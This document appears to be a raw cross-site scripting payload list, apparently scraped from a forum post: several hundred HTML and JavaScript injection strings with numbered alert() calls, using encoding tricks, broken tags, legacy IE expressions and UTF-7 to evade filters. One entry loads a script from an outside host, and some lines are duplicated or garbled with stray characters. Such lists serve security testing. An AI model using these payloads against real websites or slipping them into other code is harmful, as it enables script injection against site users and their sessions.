- <meta charset="mac-farsi">¼script¾javascript:alert(1794)¼/script¾
- X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1795)` >
- 1796<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh񁞖vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1796)>`>
- 1797<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1797)>>
- 1799<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1799) strokecolor=white strokeweight=1799000px from=0 to=1799000 /></a>
- <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
- <event-source src="%(event)s" onload="javascript:alert(1803)">
- <a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
- <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img�src=x:x�onerror�=javascript:alert(1805)>">
- <script>javascript:alert(1809)</script>
- <IMG SRC="javascript:javascript:alert(1810);">
- <IMG SRC=javascript:javascript:alert(1811)>
- <IMG SRC=`javascript:javascript:alert(1812)`>
- <FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
- <BODY ONLOAD=javascript:alert(1815)>
- <BODY ONLOAD=javascript:javascript:alert(1816)>
- <IMG SRC="jav ascript:javascript:alert(1817);">
- <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1818)>
- <IMG SRC="javascript:javascript:alert(1821)"
- <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
- <IMG DYNSRC="javascript:javascript:alert(1824)">
- <IMG LOWSRC="javascript:javascript:alert(1825)">
- <BGSOUND SRC="javascript:javascript:alert(1826);">
- <BR SIZE="&{javascript:alert(1827)}">
- <LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
- <STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
- <IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
- <TABLE BACKGROUND="javascript:javascript:alert(1837)">
- <TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
- <DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
- <DIV STYLE="width:expression(javascript:alert(1840));">
- <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
- <XSS STYLE="xss:expression(javascript:alert(1842))">
- <STYLE TYPE="text/javascript">javascript:alert(1843);</STYLE>
- <STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
- <!--[if gte IE 4]><SCRIPT>javascript:alert(1846);</SCRIPT><![endif]-->
- <BASE HREF="javascript:javascript:alert(1847);//">
- <OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1849)></OBJECT>
- <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1850)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1851)</SCRIPT>"></BODY></HTML>
- <form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
- <body onscroll=javascript:alert(1855)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1856)">
- <STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
- <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1859)&&;&&<&&/script&&>
- <SCRIPT onreadystatechange=javascript:javascript:alert(1860);></SCRIPT>
- <style onreadystatechange=javascript:javascript:alert(1861);></style>
- <?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert(1862);</html:script></html:html>
- <embed code=javascript:javascript:alert(1864);></embed>
- <frameset onload=javascript:javascript:alert(1866)></frameset>
- <object onerror=javascript:javascript:alert(1867)>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
- <IMG SRC=&{javascript:alert(1870);};>
- <a href="javAascript:javascript:alert(1871)">test1871</a>
- <a href="javaascript:javascript:alert(1872)">test1872</a>
- <iframe srcdoc="<iframe/srcdoc=<img/src=''onerror=javascript:alert(1874)>>">
- ';alert(1875))//';alert(1875))//";
- alert(1876))//";alert(1876))//--
- ></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
- <IMG SRC="javascript:alert(1880);">
- <IMG SRC=javascript:alert(1881)>
- <IMG SRC=JaVaScRiPt:alert(1882)>
- <IMG SRC=javascript:alert(1883)>
- <IMG SRC=`javascript:alert(1884)`>
- <a onmouseover="alert(1885)">xxs link</a>
- <a onmouseover=alert(1886)>xxs link</a>
- <IMG """><SCRIPT>alert(1887)</SCRIPT>">
- <IMG SRC=javascript:alert(1888))>
- <IMG SRC=# onmouseover="alert(1889)">
- <IMG SRC= onmouseover="alert(1890)">
- <IMG onmouseover="alert(1891)">
- <IMG SRC="jav ascript:alert(1895);">
- <IMG SRC="jav ascript:alert(1896);">
- <IMG SRC="jav
- ascript:alert(1897);">
- <IMG SRC="jav
ascript:alert(1898);">
- perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
- <IMG SRC="  javascript:alert(1900);">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1902)>
- <<SCRIPT>alert(1904);//<</SCRIPT>
- <IMG SRC="javascript:alert(1907)"
- \";alert(1909);//
- </TITLE><SCRIPT>alert(1910);</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
- <BODY BACKGROUND="javascript:alert(1912)">
- <IMG DYNSRC="javascript:alert(1913)">
- <IMG LOWSRC="javascript:alert(1914)">
- <STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
- <BODY ONLOAD=alert(1918)>
- <BGSOUND SRC="javascript:alert(1919);">
- <BR SIZE="&{alert(1920)}">
- <LINK REL="stylesheet" HREF="javascript:alert(1921);">
- <STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
- exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1928))'>
- <STYLE TYPE="text/javascript">alert(1929);</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
- <STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
- <XSS STYLE="xss:expression(alert(1933))">
- ¼script¾alert(1935)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
- <IFRAME SRC="javascript:alert(1939);"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(1940)"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert(1942)">
- <TABLE><TD BACKGROUND="javascript:alert(1943)">
- <DIV STYLE="background-image: url(javascript:alert(1944))">
- <DIV STYLE="background-image: url(javascript:alert(1946))">
- <DIV STYLE="width: expression(alert(1947));">
- <BASE HREF="javascript:alert(1948);//">
- <? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1957);+ADw-/SCRIPT+AD4-
- <img src=``
 onerror=alert(1977)

- <script /**/>/**/alert(1981)/**/</script /**/
- <iframe/src="data:text/html,<svg ��load=alert(1983)>">
- <meta content="
 1984 
; JAVASCRIPT: alert(1984)" http-equiv="refresh"/>
- <form><iframe ䷐� src="javascript:alert(1992)"�䷐ ;>
- http://www.google<script .com>alert(1994)</script
- <script ^__^>alert(1998))</script ^__^
- </style ><script :-(>/**/alert(1999)/**/</script :-(
- �</form><input type"date" onfocus="alert(2000)">
- <a href="javascript:void(0)" onmouseover=
javascript:alert(2004)
>X</a>
- <script ~~~>alert(2005)</script ~~~>
- <iframe// src=javaSCRIPT:alert(2013)
- <%<!--'%><script>alert(2030);</script -->
- <script src="data:text/javascript,alert(2031)"></script>
- <iframe/onreadystatechange=alert(2033)
- <svg/onload=alert(2034)
- <input type="text" value=`` <div/onmouseover='alert(2036)'>X</div>
- <img src=`xx:xx`onerror=alert(2038)>
- <meta http-equiv="refresh" content="0;javascript:alert(2040)"/>
- <script>+-+-2050-+-+alert(2050)</script>
- <body/onload=<!-->倞alert(2051)>
- <script itworksinallbrowsers>/*<script* */alert(2052)</script
- <img src ?itworksonchrome?\/onerror = alert(2053)
- <svg><script onlypossibleinopera:-)> alert(2055)
- <script x> alert(2057) </script 2057=2
- <div/onmouseover='alert(2058)'> style="x:">
- <--`<img/src=` onerror=alert(2059)> --!>
- <div style="position:absolute;top:0;left:0;width:206100%;height:206100%" onmouseover="prompt(2061)" onclick="alert(2061)">x</button>
- <form><button formaction=javascript:alert(2063)>CLICKME
- <script>alert(2071);</script>
- <script>alert(2072);</script>
- <IMG SRC="javascript:alert(2073);">
- <IMG SRC=javascript:alert(2074)>
- <IMG SRC=javascript:alert(2075)>
- <IMG SRC=javascript:alert(2076)>
- <IMG """><SCRIPT>alert(2077)</SCRIPT>">
- <scr<script>ipt>alert(2078);</scr</script>ipt>
- <script>alert(2079))</script>
- <img src=foo.png onerror=alert(2080) />
- <style>@im\port'\ja\vasc\ript:alert(2081)';</style>
- <? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
- <marquee><script>alert(2083)</script></marquee>
- <IMG SRC=\"jav ascript:alert(2084);\">
- <IMG SRC=\"jav
- ascript:alert(2085);\">
- <IMG SRC=\"jav
ascript:alert(2086);\">
- <IMG SRC=javascript:alert(2087))>
- "><script>alert(2088)</script>
- </title><script>alert(2090)</script>
- </textarea><script>alert(2091)</script>
- <IMG LOWSRC=\"javascript:alert(2092)\">
- <IMG DYNSRC=\"javascript:alert(2093)\">
- <font style='color:expression(alert(2094))'>
- <img src="javascript:alert(2095)">
- <script language="JavaScript">alert(2096)</script>
- <body onunload="javascript:alert(2097);">
- <body onLoad="alert(2098);"
- [color=red' onmouseover="alert(2099)"]mouse over[/color]
- "/></a></><img src=2100.gif onerror=alert(2100)>
- window.alert(2101);
- alert(2103));'))">
- <iframe<?php echo chr(11)?> onload=alert(2104)></iframe>
- "><script alert(2105))</script>
- '">><script>alert(2107)</script>
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
- <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
- <script>2111 2111 = 1; alert(2111)</script>
- <STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
- <?='<SCRIPT>alert(2113)</SCRIPT>'?>
- " onfocus=alert(2115) "> <"
- <FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
- <STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
- perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
- perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
- <br size=\"&{alert(2120)}\">
- <scrscriptipt>alert(2121)</scrscriptipt>
- </br style=a:expression(alert(21222122>
- </script><script>alert(2123)</script>
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
- [color=red width=expression(alert(2125))][color]
- <BASE HREF="javascript:alert(2126);//">
- "></iframe><script>alert(2128)</script>
- <body onLoad="while(true) alert(2129);">
- '"></title><script>alert(2130)</script>
- </textarea>'"><script>alert(2131)</script>
- '""><script language="JavaScript"> alert(2132);</script>
- </script></script><<<<script><>>>><<<script>alert(2133)</script>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
- '></select><script>alert(2136)</script>
- a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
- ='><script>alert(2141)</script>
- <body background=javascript:'"><script>alert(2143)</script>></body>
- ">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
- ">/KinG-InFeT.NeT/><script>alert(2145)</script>
- !--" /><script>alert(2148);</script>
- <script>alert(2149)</script><marquee><h1>XSS by xss</h1></marquee>
- "><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
- '"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
- <img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
- <script>alert(2153)</script><marquee><h1>XSS by xss</h1></marquee>
- "><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
- '"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
- <iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
- '><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
- "><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
- \'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
- '); alert(2162); var x='
- \\'); alert(2163);var x=\'
- //--></SCRIPT><SCRIPT>alert(2164));
- >"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
- <SCRIPT> alert(2170); </SCRIPT>
- <BODY ONLOAD=alert(2171)>
- <BODY BACKGROUND="javascript:alert(2172)">
- <IMG SRC="javascript:alert(2173);">
- <IMG DYNSRC="javascript:alert(2174)">
- <IMG LOWSRC="javascript:alert(2175)">
- <INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
- <LINK REL="stylesheet" HREF="javascript:alert(2178);">
- <TABLE BACKGROUND="javascript:alert(2179)">
- <TD BACKGROUND="javascript:alert(2180)">
- <DIV STYLE="background-image: url(javascript:alert(2181))">
- <DIV STYLE="width: expression(alert(2182));">
- ';alert(2185))//\';alert(2185))//";alert(2185))//\";alert(2185))//--></SCRIPT>">'><SCRIPT>alert(2185))</SCRIPT>
- <SCRIPT>alert(2187)</SCRIPT>
- <SCRIPT>alert(2189))</SCRIPT>
- <BASE HREF="javascript:alert(2190);//">
- <BGSOUND SRC="javascript:alert(2191);">
- <BODY BACKGROUND="javascript:alert(2192);">
- <BODY ONLOAD=alert(2193)>
- <DIV STYLE="background-image: url(javascript:alert(2194))">
- <DIV STYLE="background-image: url(javascript:alert(2195))">
- <DIV STYLE="width: expression(alert(2196));">
- <FRAMESET><FRAME SRC="javascript:alert(2197);"></FRAMESET>
- <IFRAME SRC="javascript:alert(2198);"></IFRAME>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(2199);">
- <IMG SRC="javascript:alert(2200);">
- <IMG SRC=javascript:alert(2201)>
- <IMG DYNSRC="javascript:alert(2202);">
- <IMG LOWSRC="javascript:alert(2203);">
- <STYLE>li {list-style-image: url("javascript:alert(2207)");}</STYLE><UL><LI>XSS
- %BCscript%BEalert(2211)%BC/script%BE
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(2212);">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(2214);">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(2217)></OBJECT>
- a="get"; b="URL(""; c="javascript:"; d="alert(2219);")";
- eval(a+b+c+d);
- <STYLE TYPE="text/javascript">alert(2220);</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert(2221))">
- <XSS STYLE="xss:expression(alert(2222))">
- <STYLE>.XSS{background-image:url("javascript:alert(2223)");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert(2224)")}</STYLE>
- <LINK REL="stylesheet" HREF="javascript:alert(2225);">
- <TABLE BACKGROUND="javascript:alert(2230)"></TABLE>
- <TABLE><TD BACKGROUND="javascript:alert(2231)"></TD></TABLE>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(2233);">]]>
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(2234)"></B></I></XML>
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(2238)</SCRIPT>">
- <BR SIZE="&{alert(2243)}">
- <IMG SRC=JaVaScRiPt:alert(2244)>
- <IMG SRC=javascript:alert(2245)>
- <IMG SRC=`javascript:alert(2246)`>
- <IMG SRC=javascript:alert(2247))>
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
- \";alert(2253);//
- </TITLE><SCRIPT>alert(2254);</SCRIPT>
- <STYLE>@im\port'\ja\vasc\ript:alert(2255)';</STYLE>
- <IMG SRC="jav ascript:alert(2256);">
- <IMG SRC="jav	ascript:alert(2257);">
- <IMG SRC="jav
ascript:alert(2258);">
- <IMG SRC="jav
ascript:alert(2259);">
- perl -e 'print "<IMG SRC=java\0script:alert(2261)>";'> out
- perl -e 'print "&<SCR\0IPT>alert(2262)</SCR\0IPT>";' > out
- <IMG SRC="  javascript:alert(2263);">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2265)>
- <IMG SRC="javascript:alert(2268)"
- <<SCRIPT>alert(2270);//<</SCRIPT>
- <IMG """><SCRIPT>alert(2271)</SCRIPT>">
- "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2390)>
- </script><script>alert(2391)</script>
- </br style=a:expression(alert(23922392>
- <scrscriptipt>alert(2393)</scrscriptipt>
- <br size=\"&{alert(2394)}\">
- perl -e 'print \"<IMG SRC=java\0script:alert(2395)>\";' > out
- perl -e 'print \"<SCR\0IPT>alert(2396)</SCR\0IPT>\";' > out
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2397))>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2399))>
- <~/XSS STYLE=xss:expression(alert(2400))>
- "><script>alert(2401)</script>
- </XSS/*-*/STYLE=xss:e/**/xpression(alert(2402))>
- XSS/*-*/STYLE=xss:e/**/xpression(alert(2403))>
- XSS STYLE=xss:e/**/xpression(alert(2404))>
- </XSS STYLE=xss:expression(alert(2405))>
- ';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(2406))<;/SCRIPT>;
- <;SCRIPT>;alert(2408)<;/SCRIPT>;
- <;SCRIPT>;alert(2410))<;/SCRIPT>;
- <;BASE HREF=";javascript:alert(2411);//";>;
- <;BGSOUND SRC=";javascript:alert(2412);";>;
- <;BODY BACKGROUND=";javascript:alert(2413);";>;
- <;BODY ONLOAD=alert(2414)>;
- <;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
- <;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
- <;DIV STYLE=";width: expression(alert(2417));";>;
- <;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
- <;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
- <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
- <;IMG SRC=";javascript:alert(2421);";>;
- <;IMG SRC=javascript:alert(2422)>;
- <;IMG DYNSRC=";javascript:alert(2423);";>;
- <;IMG LOWSRC=";javascript:alert(2424);";>;
- <;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
- %BCscript%BEalert(2432)%BC/script%BE
- <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
- <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
- <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(2438)>;<;/OBJECT>;
- a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(2440);";)";;
- eval(a+b+c+d);
- <;STYLE TYPE=";text/javascript";>;alert(2441);<;/STYLE>;
- <;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
- <;XSS STYLE=";xss:expression(alert(2443))";>;
- <;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
- <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
- <;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
- <;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
- <;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
- <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
- <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
- <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
- <;BR SIZE=";&;{alert(2464)}";>;
- <;IMG SRC=JaVaScRiPt:alert(2465)>;
- <;IMG SRC=javascript:alert(2466)>;
- <;IMG SRC=`javascript:alert(2467)`>;
- <;IMG SRC=javascript:alert(2468))>;
- <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(2473);+ADw-/SCRIPT+AD4-
- \";;alert(2474);//
- <;/TITLE>;<;SCRIPT>;alert(2475);<;/SCRIPT>;
- <;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
- <;IMG SRC=";jav ascript:alert(2477);";>;
- <;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
- <;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
- <;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
- perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
- perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
- <;IMG SRC="; &;#14; javascript:alert(2484);";>;
- <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2486)>;
- <;IMG SRC=";javascript:alert(2489)";
- <;<;SCRIPT>;alert(2491);//<;<;/SCRIPT>;
- <;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
- ";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
- <;/script>;<;script>;alert(2612)<;/script>;
- <;/br style=a:expression(alert(26132613>;
- <;scrscriptipt>;alert(2614)<;/scrscriptipt>;
- <;br size=\";&;{alert(2615)}\";>;
- perl -e 'print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
- perl -e 'print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2618))>
- <~/XSS/*-*/STYLE=xss:e/**/xpression(alert(2620))>
- <~/XSS STYLE=xss:expression(alert(2621))>
- "><script>alert(2622)</script>
- </XSS/*-*/STYLE=xss:e/**/xpression(alert(2623))>
- XSS/*-*/STYLE=xss:e/**/xpression(alert(2624))>
- XSS STYLE=xss:e/**/xpression(alert(2625))>
- </XSS STYLE=xss:expression(alert(2626))>
- >"><script>alert(2627)</script>&
- "><STYLE>@import"javascript:alert(2628)";</STYLE>
- >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
- >%22%27><img%20src%3d%22javascript:alert(2630)%22>
- '%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
- <IMG SRC="javascript:alert(2633);">
- <IMG SRC=javascript:alert(2634)>
- <IMG SRC=JaVaScRiPt:alert(2635)>
- <IMG SRC=JaVaScRiPt:alert(2636)>
- <IMG SRC="jav
- ascript:alert(2640);">
- <IMG SRC="jav
ascript:alert(2641);">
- <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(2643);<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
- <script>alert(2649)</script>
- %3cscript%3ealert(2650)%3c/script%3e
- %22%3e%3cscript%3ealert(2651)%3c/script%3e
- <IMG SRC="javascript:alert(2652);">
- <IMG SRC=javascript:alert(2653)>
- <IMG SRC=javascript:alert(2654)>
- <img src=xss onerror=alert(2655)>
- <IMG """><SCRIPT>alert(2656)</SCRIPT>">
- <IMG SRC=javascript:alert(2657))>
- <IMG SRC="jav ascript:alert(2658);">
- <IMG SRC="jav ascript:alert(2659);">
- <BODY BACKGROUND="javascript:alert(2663)">
- <BODY ONLOAD=alert(2664)>
- <INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
- <IMG SRC="javascript:alert(2666)"
- <<SCRIPT>alert(2668);//<</SCRIPT>
- %253cscript%253ealert(2669)%253c/script%253e
- "><s"%2b"cript>alert(2670)</script>
- foo<script>alert(2671)</script>
- <scr<script>ipt>alert(2672)</scr</script>ipt>
- ';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert(2674))</SCRIPT>
- <marquee onstart='javascript:alert(2675);'>=(◕_◕)=
- </span></span><svg onload="alert(2676)//“ #"="">
复制代码 |
|